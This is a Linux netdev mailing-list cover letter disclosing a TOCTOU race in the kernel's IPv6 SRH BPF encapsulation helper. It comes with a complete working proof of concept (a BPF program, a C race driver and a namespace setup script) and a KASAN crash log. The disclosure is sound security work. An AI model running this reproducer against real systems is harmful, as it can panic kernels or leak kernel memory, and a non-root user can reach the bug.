Netdev List
 help / color / mirror / Atom feed
* [PATCH 0/1] bpf: fix TOCTOU in IPv6 SRH encapsulation
@ 2026-09-17 16:33 Ren Wei
  2026-09-17 16:33 ` [PATCH 1/1] " Ren Wei
  0 siblings, 1 reply; 3+ messages in thread
From: Ren Wei @ 2026-09-17 16:33 UTC (permalink / raw)
  To: bpf, netdev
  Cc: daniel, john.fastabend, sdf, martin.lau, ast, andrii, eddyz87,
	memxor, song, yonghong.song, jolsa, emil, ihor.solodrai, davem,
	edumazet, kuba, pabeni, horms, m.xhonneux, dlebrun, vega,
	rakukuip, weir

From: Luxiao Xu <rakukuip@gmail.com>

Hi Linux kernel maintainers,

We found and validated a issue in net/core/filter.c. The bug is reachable by a non-root user via user and net namespace.
We've tested it, and it should not affect any other functionality.

We will provide detailed information about the bug
in this email, along with a PoC to trigger it.

---- details below ----

Bug details:

BPF helper SRH arguments may reference shared array-map values.
In bpf_push_seg6_encap(), the SRH buffer is validated once using
seg6_validate_srh() with the constant verifier-approved length.
However, downstream encapsulation functions (such as __seg6_do_srh_encap()
and __seg6_do_srh_inline() in net/ipv6/seg6_iptunnel.c) later reread
fields such as hdrlen and first_segment without snapshotting the
validated bytes.

Another CPU or userspace process can concurrently update the array-map
value between validation and use, changing hdrlen to request up to 2048
bytes from a much smaller map allocation or changing the segment index.
The resulting memcpy and segment access can read beyond the map bounds,
placing adjacent kernel memory in a transmitted packet or triggering a
kernel panic.

Root cause:
bpf_push_seg6_encap() passes a mutable pointer referencing shared BPF map
memory directly onward without creating a private snapshot of the validated
bytes. Downstream functions reread mutable fields from this buffer,
creating a Time-of-Check to Time-of-Use (TOCTOU) race condition.

Reproducer:

    clang -O2 -target bpf -c poc.bpf.c -o poc.bpf.o
    gcc -O2 -Wall -Wextra -pthread -o poc poc.c
    ./poc.sh

We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment.

------BEGIN poc_common.h------

#ifndef SEG6_HDRLEN_RACE_POC_COMMON_H
#define SEG6_HDRLEN_RACE_POC_COMMON_H

#include <linux/types.h>

#define POC_SRH_VALUE_SIZE 504
#define POC_SRH_GOOD_HDRLEN ((POC_SRH_VALUE_SIZE >> 3) - 1)
#define POC_TLV_BYTES (POC_SRH_VALUE_SIZE - 8 - 16)
#define POC_TLV_COUNT (POC_TLV_BYTES / 2)
#define POC_SEG6_TYPE 4

struct poc_in6_addr {
	__u8 bytes[16];
};

struct poc_ipv6_sr_hdr {
	__u8 nexthdr;
	__u8 hdrlen;
	__u8 type;
	__u8 segments_left;
	__u8 first_segment;
	__u8 flags;
	__be16 tag;
};

struct poc_tlv {
	__u8 type;
	__u8 len;
};

struct poc_srh_value {
	struct poc_ipv6_sr_hdr srh;
	struct poc_in6_addr segment0;
	struct poc_tlv tlvs[POC_TLV_COUNT];
};

_Static_assert(sizeof(struct poc_ipv6_sr_hdr) == 8,
	       "unexpected SRH header size");
_Static_assert((POC_TLV_BYTES % 2) == 0, "TLV bytes must be divisible by 2");
_Static_assert(sizeof(struct poc_srh_value) == POC_SRH_VALUE_SIZE,
	       "unexpected SRH value size");

#endif

------END poc_common.h--------

------BEGIN poc.bpf.c------

#include <linux/bpf.h>

#include "poc_common.h"

#define SEC(name) __attribute__((section(name), used))
#define __uint(name, val) int (*name)[val]
#define __type(name, val) val *name

static void *(*bpf_map_lookup_elem)(void *map, const void *key) =
	(void *)BPF_FUNC_map_lookup_elem;
static long (*bpf_lwt_push_encap)(struct __sk_buff *skb, __u32 encap_type,
				      void *hdr, __u32 len) =
	(void *)BPF_FUNC_lwt_push_encap;

struct {
	__uint(type, BPF_MAP_TYPE_ARRAY);
	__uint(max_entries, 1);
	__type(key, __u32);
	__type(value, struct poc_srh_value);
} seg6_srh_diy SEC(".maps");

static __always_inline int do_push(struct __sk_buff *skb, __u32 encap_type)
{
	__u32 key = 0;
	struct poc_srh_value *value;
	long err;

	value = bpf_map_lookup_elem(&seg6_srh_diy, &key);
	if (!value)
		return BPF_DROP;

	err = bpf_lwt_push_encap(skb, encap_type, value, sizeof(*value));
	if (err)
		return BPF_DROP;

	return BPF_REDIRECT;
}

SEC("encap")
int encap_prog(struct __sk_buff *skb)
{
	return do_push(skb, BPF_LWT_ENCAP_SEG6);
}

SEC("inline")
int inline_srh(struct __sk_buff *skb)
{
	return do_push(skb, BPF_LWT_ENCAP_SEG6_INLINE);
}

char _license[] SEC("license") = "GPL";

------END poc.bpf.c--------

------BEGIN poc.c------

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include "poc_common.h"

#define WRITER_COUNT 2
#define SENDER_COUNT 2
#define BATCH_SIZE 32
#define PAYLOAD_SIZE 64

struct run_config {
	const char *map_path;
	const char *netns_path;
	const char *src_addr;
	const char *dst_addr;
	unsigned int seconds;
};

struct writer_args {
	int map_fd;
	int cpu;
	const struct poc_srh_value *good;
	const struct poc_srh_value *bad;
	struct timespec end;
};

static int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr)
{
	return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static int bpf_obj_get_fd(const char *path)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.pathname = (uintptr_t)path;
	return sys_bpf(BPF_OBJ_GET, &attr);
}

static int bpf_map_update_fd(int fd, const void *key, const void *value)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.map_fd = fd;
	attr.key = (uintptr_t)key;
	attr.value = (uintptr_t)value;
	attr.flags = BPF_ANY;
	return sys_bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static void set_cpu_affinity(int cpu)
{
	cpu_set_t set;

	CPU_ZERO(&set);
	CPU_SET(cpu, &set);
	if (sched_setaffinity(0, sizeof(set), &set) == -1)
		perror("sched_setaffinity");
}

static void fill_good_value(struct poc_srh_value *value)
{
	memset(value, 0, sizeof(*value));

	value->srh.hdrlen = POC_SRH_GOOD_HDRLEN;
	value->srh.type = POC_SEG6_TYPE;
	value->srh.segments_left = 0;
	value->srh.first_segment = 0;

	value->segment0.bytes[0] = 0xfd;
	value->segment0.bytes[15] = 1;
}

static int deadline_reached(const struct timespec *end)
{
	struct timespec now;

	if (clock_gettime(CLOCK_MONOTONIC, &now) == -1) {
		perror("clock_gettime");
		return 1;
	}

	if (now.tv_sec > end->tv_sec)
		return 1;

	if (now.tv_sec == end->tv_sec && now.tv_nsec >= end->tv_nsec)
		return 1;

	return 0;
}

static void *writer_thread(void *arg)
{
	static const __u32 key = 0;
	struct writer_args *writer = arg;

	set_cpu_affinity(writer->cpu);

	while (!deadline_reached(&writer->end)) {
		if (bpf_map_update_fd(writer->map_fd, &key, writer->bad) == -1) {
			perror("BPF_MAP_UPDATE_ELEM bad");
			break;
		}

		if (bpf_map_update_fd(writer->map_fd, &key, writer->good) == -1) {
			perror("BPF_MAP_UPDATE_ELEM good");
			break;
		}
	}

	return NULL;
}

static void kill_children(pid_t *children, size_t count)
{
	size_t i;

	for (i = 0; i < count; i++) {
		if (children[i] > 0)
			kill(children[i], SIGKILL);
	}

	for (i = 0; i < count; i++) {
		if (children[i] > 0)
			waitpid(children[i], NULL, 0);
	}
}

static void sender_loop(const struct run_config *cfg, int cpu)
{
	char payloads[BATCH_SIZE][PAYLOAD_SIZE];
	struct iovec iovecs[BATCH_SIZE];
	struct mmsghdr msgs[BATCH_SIZE];
	struct sockaddr_in6 src;
	struct sockaddr_in6 dst;
	int fd;
	int i;

	set_cpu_affinity(cpu);

	fd = socket(AF_INET6, SOCK_DGRAM, 0);
	if (fd == -1) {
		perror("socket");
		_exit(1);
	}

	memset(&src, 0, sizeof(src));
	src.sin6_family = AF_INET6;
	if (inet_pton(AF_INET6, cfg->src_addr, &src.sin6_addr) != 1) {
		fprintf(stderr, "failed to parse source address %s\n",
			cfg->src_addr);
		_exit(1);
	}

	if (bind(fd, (struct sockaddr *)&src, sizeof(src)) == -1) {
		perror("bind");
		_exit(1);
	}

	memset(&dst, 0, sizeof(dst));
	dst.sin6_family = AF_INET6;
	dst.sin6_port = htons(7330);
	if (inet_pton(AF_INET6, cfg->dst_addr, &dst.sin6_addr) != 1) {
		fprintf(stderr, "failed to parse destination address %s\n",
			cfg->dst_addr);
		_exit(1);
	}

	for (i = 0; i < BATCH_SIZE; i++) {
		memset(payloads[i], 'A' + (i % 26), sizeof(payloads[i]));

		memset(&iovecs[i], 0, sizeof(iovecs[i]));
		iovecs[i].iov_base = payloads[i];
		iovecs[i].iov_len = sizeof(payloads[i]);

		memset(&msgs[i], 0, sizeof(msgs[i]));
		msgs[i].msg_hdr.msg_iov = &iovecs[i];
		msgs[i].msg_hdr.msg_iovlen = 1;
		msgs[i].msg_hdr.msg_name = &dst;
		msgs[i].msg_hdr.msg_namelen = sizeof(dst);
	}

	for (;;) {
		if (sendmmsg(fd, msgs, BATCH_SIZE, 0) < 0) {
			if (errno == EINTR || errno == ENOBUFS ||
			    errno == ECONNREFUSED || errno == EHOSTUNREACH ||
			    errno == ENETUNREACH)
				continue;

			perror("sendmmsg");
			_exit(1);
		}
	}
}

static pid_t start_sender(const struct run_config *cfg, int cpu)
{
	pid_t pid;
	int nsfd;

	pid = fork();
	if (pid != 0)
		return pid;

	nsfd = open(cfg->netns_path, O_RDONLY);
	if (nsfd == -1) {
		perror("open netns");
		_exit(1);
	}

	if (setns(nsfd, CLONE_NEWNET) == -1) {
		perror("setns");
		_exit(1);
	}
	close(nsfd);

	sender_loop(cfg, cpu);
	_exit(0);
}

int main(int argc, char **argv)
{
	struct poc_srh_value good;
	struct poc_srh_value bad;
	struct writer_args writers[WRITER_COUNT];
	pthread_t writer_threads[WRITER_COUNT];
	struct run_config cfg;
	struct timespec end;
	pid_t children[SENDER_COUNT];
	static const __u32 key = 0;
	int map_fd;
	int i;

	if (argc != 6) {
		fprintf(stderr,
			"usage: %s <pinned-map> <netns-path> <src-ipv6> <dst-ipv6> <seconds>\n",
			argv[0]);
		return 2;
	}

	memset(&cfg, 0, sizeof(cfg));
	cfg.map_path = argv[1];
	cfg.netns_path = argv[2];
	cfg.src_addr = argv[3];
	cfg.dst_addr = argv[4];
	cfg.seconds = strtoul(argv[5], NULL, 0);

	map_fd = bpf_obj_get_fd(cfg.map_path);
	if (map_fd == -1) {
		perror("BPF_OBJ_GET");
		return 1;
	}

	fill_good_value(&good);
	bad = good;
	bad.srh.hdrlen = 0xff;

	if (bpf_map_update_fd(map_fd, &key, &good) == -1) {
		perror("BPF_MAP_UPDATE_ELEM initial");
		return 1;
	}

	memset(children, 0, sizeof(children));
	for (i = 0; i < SENDER_COUNT; i++) {
		children[i] = start_sender(&cfg, WRITER_COUNT + i);
		if (children[i] == -1) {
			perror("fork");
			kill_children(children, SENDER_COUNT);
			return 1;
		}
	}

	if (clock_gettime(CLOCK_MONOTONIC, &end) == -1) {
		perror("clock_gettime");
		kill_children(children, SENDER_COUNT);
		return 1;
	}
	end.tv_sec += cfg.seconds;

	fprintf(stderr,
		"racing hdrlen for %u seconds with %d writer threads and %d sender processes\n",
		cfg.seconds, WRITER_COUNT, SENDER_COUNT);

	for (i = 0; i < WRITER_COUNT; i++) {
		memset(&writers[i], 0, sizeof(writers[i]));
		writers[i].map_fd = map_fd;
		writers[i].cpu = i;
		writers[i].good = &good;
		writers[i].bad = &bad;
		writers[i].end = end;

		if (pthread_create(&writer_threads[i], NULL, writer_thread,
				   &writers[i]) != 0) {
			perror("pthread_create");
			kill_children(children, SENDER_COUNT);
			return 1;
		}
	}

	for (i = 0; i < WRITER_COUNT; i++)
		pthread_join(writer_threads[i], NULL);

	kill_children(children, SENDER_COUNT);
	return 1;
}

------END poc.c--------

------BEGIN poc.sh------

#!/bin/sh
set -eu

DIR=$(CDPATH= cd -- "$(dirname -- "$0")" && pwd)
NS1=seg6diy1
NS2=seg6diy2
MAP_PIN=/sys/fs/bpf/seg6_srh_diy
SRC_ADDR=fb00::1
DST_ADDR=fb00::6
SECONDS=${SECONDS:-120}

cleanup() {
	set +e
	ip netns del "$NS1" 2>/dev/null
	ip netns del "$NS2" 2>/dev/null
	rm -f "$MAP_PIN"
}

setup_namespaces() {
	ip netns add "$NS1"
	ip netns add "$NS2"

	ip link add veth1 type veth peer name veth2
	ip link set veth1 netns "$NS1"
	ip link set veth2 netns "$NS2"

	ip -n "$NS1" link set lo up
	ip -n "$NS1" link set veth1 up
	ip -n "$NS2" link set lo up
	ip -n "$NS2" link set veth2 up

	ip -n "$NS1" -6 addr add fb00::12/16 dev veth1 scope link
	ip -n "$NS1" -6 addr add "$SRC_ADDR"/128 dev lo
	ip -n "$NS2" -6 addr add fb00::21/16 dev veth2 scope link

	ip -n "$NS1" -6 route add "$DST_ADDR" via fb00::21 dev veth1
	ip -n "$NS2" -6 route add fd00::/16 dev veth2

	ip netns exec "$NS2" sysctl -q net.ipv6.conf.all.forwarding=1
	ip netns exec "$NS2" sysctl -q net.ipv6.conf.all.seg6_enabled=1
	ip netns exec "$NS2" sysctl -q net.ipv6.conf.veth2.seg6_enabled=1
}

load_mode() {
	mode=$1
	map_id=

	ip -n "$NS2" -6 route add "$DST_ADDR" encap bpf in obj \
		"$DIR/poc.bpf.o" sec "$mode" dev veth2

	map_id=$(bpftool -j map show | jq -r \
		'[.[] | select(.name == "seg6_srh_diy")] | last | .id')

	if [ -z "$map_id" ] || [ "$map_id" = "null" ]; then
		echo "failed to locate seg6_srh_diy map" >&2
		return 1
	fi

	rm -f "$MAP_PIN"
	bpftool map pin id "$map_id" "$MAP_PIN"
}

if [ ! -x "$DIR/poc" ]; then
	gcc -O2 -Wall -Wextra -pthread -o "$DIR/poc" "$DIR/poc.c"
fi

if [ ! -f "$DIR/poc.bpf.o" ]; then
	echo "missing $DIR/poc.bpf.o; build it with make on the host or install clang in the guest" >&2
	exit 1
fi

grep -qs ' /sys/fs/bpf ' /proc/mounts || mount -t bpf bpf /sys/fs/bpf

trap cleanup EXIT INT TERM
cleanup

for mode in encap inline; do
	echo "trying mode: $mode" >&2
	setup_namespaces
	load_mode "$mode"

	set +e
	"$DIR/poc" "$MAP_PIN" "/run/netns/$NS1" "$SRC_ADDR" "$DST_ADDR" "$SECONDS"
	status=$?
	set -e

	if [ "$status" -eq 0 ]; then
		exit 0
	fi

	echo "mode $mode did not crash within ${SECONDS}s" >&2
	cleanup
done

exit 1

------END poc.sh--------

----BEGIN crash log----

[  276.949174][    C3] page_owner tracks the page as allocated
[  276.949657][    C3] page last allocated via order 3, migratetype Unmovable, gfp_mask 0xd20c0(__GFP_IO|__GFP_FS|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP|__GFP_NOMEMALLOC), pid 1, tgid 1 (systemd), ts 274478733398, free_ts 266306304894
[  276.951258][    C3] page last free pid 10427 tgid 10427 stack trace:
[  276.951915][    C3] Kernel panic - not syncing: KASAN: panic_on_warn set ...
[  276.952401][    C3] CPU: 3 UID: 0 PID: 36 Comm: ksoftirqd/3 Not tainted 6.12.95 #2
[  276.952962][    C3] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  276.953755][    C3] Call Trace:
[  276.953985][    C3]  <TASK>
[  276.954188][    C3]  panic+0x533/0x610
[  276.954479][    C3]  ? __pfx_panic+0x10/0x10
[  276.954789][    C3]  ? rcu_is_watching+0x12/0xc0
[  276.955131][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.955530][    C3]  ? __pfx_lock_release+0x10/0x10
[  276.955861][    C3]  ? __pfx__printk+0x10/0x10
[  276.956183][    C3]  ? __seg6_do_srh_encap+0x5cd/0x10e0
[  276.956545][    C3]  check_panic_on_warn+0x61/0x80
[  276.956880][    C3]  end_report+0x11b/0x180
[  276.957184][    C3]  kasan_report+0xe8/0x110
[  276.957501][    C3]  ? __seg6_do_srh_encap+0x5cd/0x10e0
[  276.957857][    C3]  kasan_check_range+0xf4/0x1a0
[  276.958182][    C3]  __asan_memcpy+0x23/0x60
[  276.958510][    C3]  __seg6_do_srh_encap+0x5cd/0x10e0
[  276.958850][    C3]  ? __pfx_fib6_rule_lookup+0x10/0x10
[  276.959208][    C3]  ? process_backlog+0x38c/0x1400
[  276.959567][    C3]  bpf_push_seg6_encap+0x400/0x500
[  276.959906][    C3]  bpf_lwt_in_push_encap+0x34/0x50
[  276.960251][    C3]  bpf_prog_8f4d49409a198b5d_encap_prog+0x6f/0x88
[  276.960675][    C3]  run_lwt_bpf.isra.0+0x32f/0x8c0
[  276.961031][    C3]  ? __pfx_run_lwt_bpf.isra.0+0x10/0x10
[  276.961418][    C3]  ? __pfx_ip6_route_input+0x10/0x10
[  276.961800][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.962164][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.962551][    C3]  ? rcu_is_watching+0x12/0xc0
[  276.962878][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.963263][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.963669][    C3]  ? process_backlog+0x38c/0x1400
[  276.963990][    C3]  bpf_input+0xa6/0xa10
[  276.964272][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.964643][    C3]  ? __pfx_ipv6_rcv+0x10/0x10
[  276.964976][    C3]  ? process_backlog+0x38c/0x1400
[  276.965315][    C3]  lwtunnel_input+0x1e9/0x4e0
[  276.965651][    C3]  __netif_receive_skb_one_core+0x11a/0x1b0
[  276.966059][    C3]  ? __pfx___netif_receive_skb_one_core+0x10/0x10
[  276.966508][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.966864][    C3]  ? lock_acquire+0x2f/0xb0
[  276.967213][    C3]  ? process_backlog+0x38c/0x1400
[  276.967560][    C3]  process_backlog+0x3cc/0x1400
[  276.967905][    C3]  __napi_poll.constprop.0+0xa1/0x440
[  276.968296][    C3]  net_rx_action+0x928/0xe20
[  276.968614][    C3]  ? __pfx_net_rx_action+0x10/0x10
[  276.968966][    C3]  ? rcu_core+0xab2/0x14b0
[  276.969307][    C3]  handle_softirqs+0x2ae/0x8b0
[  276.969626][    C3]  ? __pfx_handle_softirqs+0x10/0x10
[  276.970004][    C3]  ? srso_alias_return_thunk+0x5/0xfbef5
[  276.970390][    C3]  ? rcu_is_watching+0x12/0xc0
[  276.970711][    C3]  run_ksoftirqd+0x3d/0x70
[  276.971006][    C3]  smpboot_thread_fn+0x521/0x8c0
[  276.971362][    C3]  ? smpboot_thread_fn+0x56/0x8c0
[  276.971732][    C3]  ? __pfx_smpboot_thread_fn+0x10/0x10
[  276.972103][    C3]  ? __pfx_smpboot_thread_fn+0x10/0x10
[  276.972485][    C3]  kthread+0x27e/0x350
[  276.972756][    C3]  ? _raw_spin_unlock_irq+0x28/0x50
[  276.973108][    C3]  ? __pfx_kthread+0x10/0x10
[  276.973424][    C3]  ret_from_fork+0x31/0x70
[  276.973789][    C3]  ? __pfx_kthread+0x10/0x10
[  276.974263][    C3]  ret_from_fork_asm+0x1a/0x30
[  276.974794][    C3]  </TASK>
[  276.975278][    C3] Kernel Offset: disabled
[  276.975641][    C3] Rebooting in 86400 seconds..

-----END crash log-----

Best regards,
Luxiao Xu

Luxiao Xu (1):
  bpf: fix TOCTOU in IPv6 SRH encapsulation

 net/core/filter.c | 25 +++++++++++++++++--------
 1 file changed, 17 insertions(+), 8 deletions(-)

-- 
2.43.0

^ permalink raw reply	[flat|nested] 3+ messages in thread

end of thread, other threads:[~2026-09-17 16:59 UTC | newest]

Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-09-17 16:33 [PATCH 0/1] bpf: fix TOCTOU in IPv6 SRH encapsulation Ren Wei
2026-09-17 16:33 ` [PATCH 1/1] " Ren Wei
2026-09-17 16:59   ` Alexei Starovoitov

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox